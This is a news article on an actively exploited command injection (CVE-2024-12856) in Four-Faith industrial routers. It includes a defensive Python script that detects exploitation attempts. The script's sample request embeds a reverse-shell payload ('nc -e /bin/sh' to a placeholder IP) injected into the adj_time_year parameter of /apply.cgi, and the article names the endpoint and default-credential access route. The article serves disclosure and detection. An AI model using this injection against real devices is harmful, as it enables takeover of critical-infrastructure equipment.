New Vulnerability Exploited in Four-Faith Routers


Attackers Exploiting OS Command Injection Vulnerability

An industrial router crafted by Four-Faith (Image: Four-Faith)

A high-severity OS command injection vulnerability is being actively exploited against industrial routers made by Four-Faith, a Chinese manufacturer. The flaw has raised alarms because of the number of internet-exposed devices it could compromise.

Tracked as CVE-2024-12856, the vulnerability affects the F3x24 and F3x36 router models. It is a post-authentication command injection, but because the routers ship with default credentials, an attacker who can reach the web interface can log in and execute commands remotely, a combination that could compromise thousands of installations, according to cybersecurity firm VulnCheck, which reported the issue.

The primary users of these routers span various industries, including industrial automation, manufacturing plants, power grids, renewable energy, water utilities, and transportation, where they enable remote monitoring and control of critical infrastructure. Vulnerabilities in such equipment not only expose these sectors to risks but also pose broader threats to operational integrity.

VulnCheck assigned the issue a CVSS score of 7.2, placing it in the high-severity range. The flaw lies in the /apply.cgi endpoint, where the adj_time_year parameter (intended to set the device's clock year) is passed into a system command without proper sanitization. Attackers are logging in with the routers' default credentials, which removes the only barrier in front of the injection point and leaves unpatched, default-configured systems fully exposed.

According to VulnCheck, around 15,000 internet-facing devices are affected. In the observed attacks, the injected command launches a reverse shell, giving the attacker interactive control of the router. The active campaign has been traced to the IP address 178.215.238.91; given the number of exposed devices, a single source is enough to reach a large share of them.

VulnCheck also linked the current campaign to earlier exploitation attempts from the same source, noting that the same user-agent strings were observed in November. To help defenders, the firm published a Suricata rule that flags HTTP POST requests matching the exploitation pattern, so organizations can detect attempts on the wire even before a firmware fix is available.
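The detection idea behind such a rule can be shown in a few lines of Python. The following is an added example written for this article; it is not VulnCheck's Suricata rule and not Four-Faith code. It assumes only what the article states: exploitation is an HTTP POST to /apply.cgi whose adj_time_year value carries an injected shell command instead of a four-digit year. The two HTTP requests embedded below are constructed samples (the Authorization header value is a placeholder, not the routers' real default credentials).

```python
"""Flag HTTP POST requests that abuse the Four-Faith /apply.cgi
adj_time_year parameter (CVE-2024-12856).

Added example for this article, not VulnCheck's rule or vendor code.
Assumption: a legitimate adj_time_year is a four-digit year, so any
other value, and in particular one containing shell metacharacters,
is an exploitation attempt.
"""
import re
from urllib.parse import unquote_plus

TARGET_PATH = "/apply.cgi"
PARAM = "adj_time_year"
YEAR_RE = re.compile(r"^\d{4}$")          # what the field should hold
SHELL_META = re.compile(r"[;&|`$()<>\n]") # characters a year never needs

# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (
    "POST /apply.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "adj_time_year=2024&adj_time_month=12&adj_time_day=27"
)
# Year field carries "2024;nc -e /bin/sh 198.51.100.7 4444;" URL-encoded.
MALICIOUS_REQUEST = (
    "POST /apply.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Authorization: Basic <default-credentials-placeholder>\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "adj_time_year=2024%3Bnc+-e+%2Fbin%2Fsh+198.51.100.7+4444%3B"
    "&adj_time_month=12"
)


def parse_http_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split(" ")
    method = parts[0] if parts else ""
    path = parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body, splitting only on
    '&' so an unencoded ';' in a value is kept as part of the value."""
    form = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        form.setdefault(unquote_plus(key), unquote_plus(value))
    return form


def classify_request(raw: str) -> dict:
    """Return a verdict for one raw request: suspicious or not, and why."""
    method, path, headers, body = parse_http_request(raw)
    verdict = {
        "method": method,
        "path": path,
        "authenticated": "authorization" in headers or "cookie" in headers,
        "suspicious": False,
        "reason": "",
    }
    if method != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return verdict
    year = parse_form(body).get(PARAM)
    if year is None or YEAR_RE.fullmatch(year):
        return verdict
    verdict["suspicious"] = True
    if SHELL_META.search(year):
        verdict["reason"] = f"shell metacharacters in {PARAM}: {year!r}"
    else:
        verdict["reason"] = f"non-numeric {PARAM}: {year!r}"
    return verdict


def scan(requests) -> list:
    """Return verdicts for every request that looks like an exploit attempt."""
    return [v for v in (classify_request(r) for r in requests) if v["suspicious"]]


if __name__ == "__main__":
    for hit in scan([BENIGN_REQUEST, MALICIOUS_REQUEST]):
        print(hit["method"], hit["path"], "->", hit["reason"])
```

The check is deliberately narrow: a POST to the vulnerable endpoint whose year field is anything but four digits. That catches both the reverse-shell payload the article describes and simpler probes, while a legitimate clock update passes. The `authenticated` flag records whether the request carried credentials; on a router left on default credentials, a suspicious request that is also authenticated is the case to treat as a confirmed compromise rather than a failed attempt.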

Four-Faith was notified of the vulnerability on December 20 through a responsible disclosure process, but at the time of writing no patch or firmware update has been confirmed. Until one is available, researchers recommend that operators of the affected models change the default credentials immediately, take the web interface off the public internet (or restrict it to trusted networks), and monitor the devices for unexpected outbound connections and configuration changes.

The case shows how little an adversary needs: initial access through unchanged default credentials, then code execution through a command injection in an ordinary configuration form. It is a reminder for organizations to keep reassessing their security posture, particularly for the operational technology that supports critical infrastructure, where default passwords and exposed management interfaces remain common.
